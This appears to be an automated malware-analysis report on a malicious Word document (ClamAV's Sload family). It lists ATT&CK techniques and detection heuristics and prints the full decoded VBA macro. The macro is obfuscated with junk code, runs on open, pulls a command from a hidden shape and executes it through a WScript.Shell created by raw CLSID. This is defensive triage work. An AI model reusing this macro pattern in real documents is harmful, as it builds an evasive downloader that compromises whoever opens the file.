MALICIOUS
292
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.003 Windows Command Shell
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros that are configured to execute automatically upon opening. These macros leverage the WScript.Shell COM object to invoke cmd.exe and PowerShell, indicating an attempt to download and execute a secondary payload. The obfuscated command line suggests a complex download and execution chain.
Heuristics 10
-
ClamAV: Doc.Malware.Sload-6777087-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sload-6777087-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
Set zpFjRBW = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + HQMwOzw) On Error Resume Next -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set zpFjRBW = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + HQMwOzw) On Error Resume Next -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7603 bytes |
SHA-256: 80532583611be84b4ded96c42ad949b9959910c190a977a4225b12123859c30a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
115 of 179 identifiers look randomly generated (e.g. 'iInmDTjaNzv') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "iInmDTjaNzv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case qSFiFV
Case 176593762
RkjqtU = Hex(jDcIW)
UKpACCuqP = Cos(78931746)
WzzUHiJzr = 123866763
Case 124231645
iIjvbtd = Hex(iXSVHQ)
DSjVBYt = Sqr(129297158 / CSng(317194285 - Cos(147563730 - 211019213) + USJijCh + Rnd(44056466 - 285617669)))
HTwmuM = Hex(fcMqEGjLz)
End Select
On Error Resume Next
Select Case OWPZG
Case 123802421
zWvltjwZZ = Hex(oziEl)
KGPjzDfC = Cos(257063776)
zTziDfjZ = 44567978
Case 221779699
FUrRX = Hex(tmEnC)
mFSqmut = Sqr(285893376 / CSng(295667817 - Cos(333459047 - 71990123) + daqBJPJz + Rnd(26382225 - 201521290)))
mYPaw = Hex(PivvqNdl)
End Select
On Error Resume Next
Select Case YJjnPuJk
Case 153121641
EtiXizjpa = Hex(rJWLCvjp)
NNbVluFF = Cos(29281143)
YcAwzPq = 141918544
Case 157170618
pmRncz = Hex(nUlTKU)
KfdYt = Sqr(196387076 / CSng(192712795 - Cos(307972471 - 203113868) + BIrNYv + Rnd(75428042 - 174033635)))
Xuavos = Hex(iRkSJNIz)
End Select
On Error Resume Next
Select Case qCYjcC
Case 74160807
QOKsCizmW = Hex(dkvCzTObI)
hvhOGQ = Cos(296776916)
GYWJzSma = 271880502
Case 336084506
XLGbWFP = Hex(oFESBtu)
Vjwlmp = Sqr(71830139 / CSng(211613722 - Cos(329687637 - 163035359) + lcPXiP + Rnd(16858626 - 246937385)))
aTLJr = Hex(FhBGUPEHR)
End Select
Set ppnZv = Shapes("QqIUpbiD")
On Error Resume Next
Select Case YCaIUWfci
Case 302944051
sYCizskD = Hex(ptmhpNW)
jFwpHVKi = Cos(15537758)
hJCvA = 230079606
Case 69565347
irbpohTrJ = Hex(QtSHAvvZ)
wkDsAujDt = Sqr(176962448 / CSng(301326538 - Cos(291694381 - 20956679) + qiiJrQP + Rnd(145582510 - 107026275)))
iRIqZJ = Hex(zalOO)
End Select
On Error Resume Next
Select Case nmsIMAqzV
Case 145706481
OzcrDIzzi = Hex(uWdAdh)
wwzNUjMsq = Cos(260319119)
kFCbUJXPU = 322612991
Case 113804233
TGJatPOI = Hex(TvwXWitT)
wNUwMY = Sqr(117589001 / CSng(125228753 - Cos(15154373 - 136004325) + ONwhLfG + Rnd(76991288 - 41597964)))
cbiRRK = Hex(Ewadw)
End Select
zkqPqPEG = "" + SVukI + tfTFwQ + chMwVlpj + ppnZv.TextFrame.TextRange.Text + NODuzS + dsKMa
On Error Resume Next
Select Case iSwOR
Case 341340570
bipUEWO = Hex(FNXUpNDd)
vYcELC = Cos(18288008)
UzVXmW = 224753650
Case 174426422
UONOwCwcP = Hex(jhstf)
fStXUQfm = Sqr(52473220 / CSng(237973600 - Cos(151638143 - 300756351) + Trours + Rnd(271479315 - 101128090)))
zWjbv = Hex(VibFq)
End Select
On Error Resume Next
Select Case wlNUXfcjd
Case 222675151
YWwiR = Hex(JVoGzcMMi)
wzjYtJL = Cos(129459040)
wNEjUYIA = 152760006
Case 188780820
rZGTz = Hex(LlzJBI)
JdjuJGOK = Sqr(191839566 / CSng(327543468 - Cos(123613120 - 220592647) + lUiqb + Rnd(269092684 - 235791724)))
iZtPbiwa = Hex(awFOaq)
End Select
On Error Resume Next
Select Case ilRLi
Case 232345182
LdDNz = Hex(jVrwlMim)
ffOfUkmm = Cos(218372567)
DZhCif = 214669908
Case 36710983
cSjii = Hex(QXmuprRV)
FlzDOTYqW = Sqr(339979559 / CSng(314656958 - Cos(47136418 - 10676961) + JQEGjJ + Rnd(90010404 - 312629450)))
jzDMA = Hex(rVlDjwzid)
End Select
On Error Resume Next
Select Case RYPwQaLw
Case 247483045
PwIzM = Hex(QGmPUXQ)
GEfVW = Cos(280939674)
zPnbQZs = 222667677
Case 11454302
KbUwo = Hex(ksRVWNtT)
IGrLvqZui = Sqr(119084423 / CSng(216616246 - Cos(143458019 - 158929839) + DYYkJJwwM + Rnd(118741274 - 121986413)))
dEUDkVThI = Hex(AVGPkj)
End Select
On Error Resume Next
Select Case khHvlEjKo
Case 327114310
FERKB = Hex(MMfwoC)
PGhAza = Cos(59040453)
zilviQ = 293455400
Case 247517069
ZjYmJtnTi = Hex(uLftwisf)
WjMOotH = Sqr(172737929 / CSng(213112172 - Cos(99212125 - 124681621) + UbmYE + Rnd(200867014 - 189808307)))
NtjPq = Hex(ASkpQq)
End Select
Set zpFjRBW = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + HQMwOzw)
On Error Resume Next
Select Case VjJzDHtUX
Case 18897691
ilvjvjmZE = Hex(jsnhw)
mmlZUOGlS = Cos(51671107)
ZVnLvfmRj = 114746456
Case 30553963
TQocppnVS = Hex(MGhlc)
UfJRnlM = Sqr(28140398 / CSng(116834274 - Cos(296290303 - 239254800) + AQRdin + Rnd(122557321 - 63895743)))
lRvimdUI = Hex(dKCJwBHn)
End Select
On Error Resume Next
Select Case OVKiavzpj
Case 221132927
LPrRj = Hex(DZZYrGp)
wZYqKK = Cos(25050622)
NnNWMwJK = 322692278
Case 176774328
wNLlo = Hex(kChWXXP)
SdWYwZX = Sqr(321693798 / CSng(170115082 - Cos(9599548 - 24949137) + JSGQP + Rnd(182175281 - 108129704)))
szlok = Hex(ZHWPqQ)
End Select
On Error Resume Next
Select Case AHHLF
Case 52629287
JlZYZFzUA = Hex(ZcwtdE)
HodTrnjKR = Cos(177297043)
WtEVCRiV = 232654319
Case 5709937
XfIOJT = Hex(cMWDODQi)
RzpOHiJ = Sqr(327815452 / CSng(49306926 - Cos(68893772 - 26929633) + hPIUrsR + Rnd(329664313 - 69038397)))
iPcpORT = Hex(AEYqMXt)
End Select
On Error Resume Next
Select Case FsaXDSBpb
Case 198789829
ipQFEtcG = Hex(ZaEQTo)
QXzotUU = Cos(304001646)
QfhID = 314956561
Case 324917293
TrpjPpXad = Hex(PfoJEOslR)
pmKVVvo = Sqr(91034715 / CSng(310936736 - Cos(331512196 - 89200067) + cGzcwqA + Rnd(221364631 - 188067519)))
PdEOVG = Hex(SQSdVIj)
End Select
Const rVrIS = 0
On Error Resume Next
Select Case ouBKZL
Case 267343171
jfQdhYO = Hex(TiNCHsX)
jjLWdjia = Cos(209682394)
batQK = 303397753
Case 44012612
oLnnt = Hex(KiPJW)
GvXSa = Sqr(297750185 / CSng(64046 - Cos(117659341 - 315801623) + zpzcz + Rnd(261847519 - 239648332)))
XTvFE = Hex(vwnEMz)
End Select
On Error Resume Next
Select Case upFEnBI
Case 327947516
sDKLwjJE = Hex(MPnsmkwfd)
AbNZZ = Cos(237618905)
Pqfkk = 118979471
Case 210404175
rFDuaXq = Hex(HlqiBD)
GHXCwNf = Sqr(196367284 / CSng(243951550 - Cos(179644608 - 321163522) + SYFbzH + Rnd(106782011 - 306771080)))
ulCjJPF = Hex(jBAMVZdM)
End Select
zpFjRBW.Run# zkqPqPEG, rVrIS
On Error Resume Next
Select Case HrzvRn
Case 253475972
thwcnb = Hex(LDkanjDvn)
VXJLA = Cos(214466582)
RlTXk = 187051212
Case 231717698
QLYriIobl = Hex(WfcriDvJ)
vQcFtBtKB = Sqr(49048105 / CSng(144659092 - Cos(177219579 - 175907146) + jWXfE + Rnd(35559187 - 298468547)))
vYfdBaZH = Hex(cainio)
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.